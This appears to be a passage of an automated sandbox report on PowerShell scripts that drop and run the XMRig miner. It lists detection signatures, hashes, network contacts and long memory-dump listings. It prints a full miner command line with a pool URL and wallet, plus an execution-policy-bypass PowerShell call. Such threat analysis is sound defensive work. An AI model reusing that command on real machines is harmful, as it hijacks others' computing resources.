memory/648-49-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/648-50-0x00007FF9EA910000-0x00007FF9EB3D1000-memory.dmp
memory/1988-51-0x0000019B6A750000-0x0000019B6A770000-memory.dmp
memory/1988-52-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-53-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-54-0x0000019B6A790000-0x0000019B6A7B0000-memory.dmp
memory/1988-55-0x0000019B6A770000-0x0000019B6A790000-memory.dmp
memory/1988-56-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-57-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-59-0x0000019B6A790000-0x0000019B6A7B0000-memory.dmp
memory/1988-60-0x0000019B6A770000-0x0000019B6A790000-memory.dmp
memory/1988-58-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-61-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-62-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-63-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-64-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-65-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-66-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-67-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-68-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-69-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-70-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-71-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-72-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-73-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-74-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-75-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-76-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-77-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-78-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-79-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-80-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-81-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-82-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-83-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-84-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-85-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-86-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-87-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-88-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-89-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-90-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-91-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-92-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-93-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-94-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-95-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-96-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-97-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-98-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-99-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-100-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-101-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-102-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-103-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-104-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-105-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-106-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-107-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-108-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-109-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-110-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-111-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-112-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-113-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-114-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-115-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-116-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-117-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
memory/1988-118-0x00007FF7D54C0000-0x00007FF7D60F3000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win10v2004-20240508-en
Max time kernel
1793s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2564 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2564 wrote to memory of 4740 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| NL | 23.62.61.155:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 155.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
Files
memory/2564-0-0x00007FFF67033000-0x00007FFF67035000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w2n0bpzn.qo1.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2564-2-0x00000123783B0000-0x00000123783D2000-memory.dmp
memory/2564-11-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/2564-12-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/2564-14-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/2564-15-0x0000012378440000-0x0000012378452000-memory.dmp
memory/2564-16-0x0000012378420000-0x000001237842A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4740-47-0x000001BFF2070000-0x000001BFF2090000-memory.dmp
memory/4740-48-0x000001BFF20B0000-0x000001BFF20D0000-memory.dmp
memory/4740-49-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-50-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-52-0x000001BFF20F0000-0x000001BFF2110000-memory.dmp
memory/4740-51-0x000001BFF20D0000-0x000001BFF20F0000-memory.dmp
memory/2564-53-0x00007FFF67033000-0x00007FFF67035000-memory.dmp
memory/2564-54-0x00007FFF67030000-0x00007FFF67AF1000-memory.dmp
memory/4740-55-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-56-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-58-0x000001BFF20F0000-0x000001BFF2110000-memory.dmp
memory/4740-57-0x000001BFF20D0000-0x000001BFF20F0000-memory.dmp
memory/4740-59-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-60-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-61-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-62-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-63-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-64-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-65-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-66-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-67-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-68-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-69-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-70-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-71-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-72-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-73-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-74-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-75-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-76-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-77-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-78-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-79-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-80-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-81-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-82-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-83-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-84-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-85-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-86-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-87-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-88-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-89-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-90-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-91-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-92-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-93-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-94-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-95-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-96-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-97-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-98-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-99-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-100-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-101-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-102-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-103-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-104-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-105-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-106-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-107-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-108-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-109-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-110-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-111-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-112-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-113-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-114-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-115-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-116-0x00007FF776740000-0x00007FF777373000-memory.dmp
memory/4740-117-0x00007FF776740000-0x00007FF777373000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:18
Platform
win10v2004-20240426-en
Max time kernel
1791s
Max time network
1803s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2460 wrote to memory of 2660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2460 wrote to memory of 2660 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
memory/2460-0-0x00007FF99C6E3000-0x00007FF99C6E5000-memory.dmp
memory/2460-10-0x000002849C3C0000-0x000002849C3E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2h5ticl0.fb5.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2460-11-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2460-12-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2460-14-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2460-15-0x000002849C450000-0x000002849C462000-memory.dmp
memory/2460-16-0x000002849C430000-0x000002849C43A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2660-47-0x000002493DC80000-0x000002493DCA0000-memory.dmp
memory/2660-48-0x000002493DCC0000-0x000002493DCE0000-memory.dmp
memory/2660-49-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-52-0x000002493F5B0000-0x000002493F5D0000-memory.dmp
memory/2660-51-0x000002493F590000-0x000002493F5B0000-memory.dmp
memory/2660-50-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2460-53-0x00007FF99C6E3000-0x00007FF99C6E5000-memory.dmp
memory/2460-54-0x00007FF99C6E0000-0x00007FF99D1A1000-memory.dmp
memory/2660-55-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-56-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-57-0x000002493F590000-0x000002493F5B0000-memory.dmp
memory/2660-58-0x000002493F5B0000-0x000002493F5D0000-memory.dmp
memory/2660-59-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-60-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-61-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-62-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-63-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-64-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-65-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-66-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-67-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-68-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-69-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-70-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-71-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-72-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-73-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-74-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-75-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-76-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-77-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-78-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-79-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-80-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-81-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-82-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-83-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-84-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-85-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-86-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-87-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-88-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-89-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-90-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-91-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-92-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-93-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-94-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-95-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-96-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-97-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-98-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-99-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-100-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-101-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-102-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-103-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-104-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-105-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-106-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-107-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-108-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-109-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-110-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-111-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-112-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-113-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-114-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-115-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-116-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
memory/2660-117-0x00007FF676390000-0x00007FF676FC3000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 05:20
Platform
win11-20240419-en
Max time kernel
1799s
Max time network
1777s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2124 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2124 wrote to memory of 2192 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
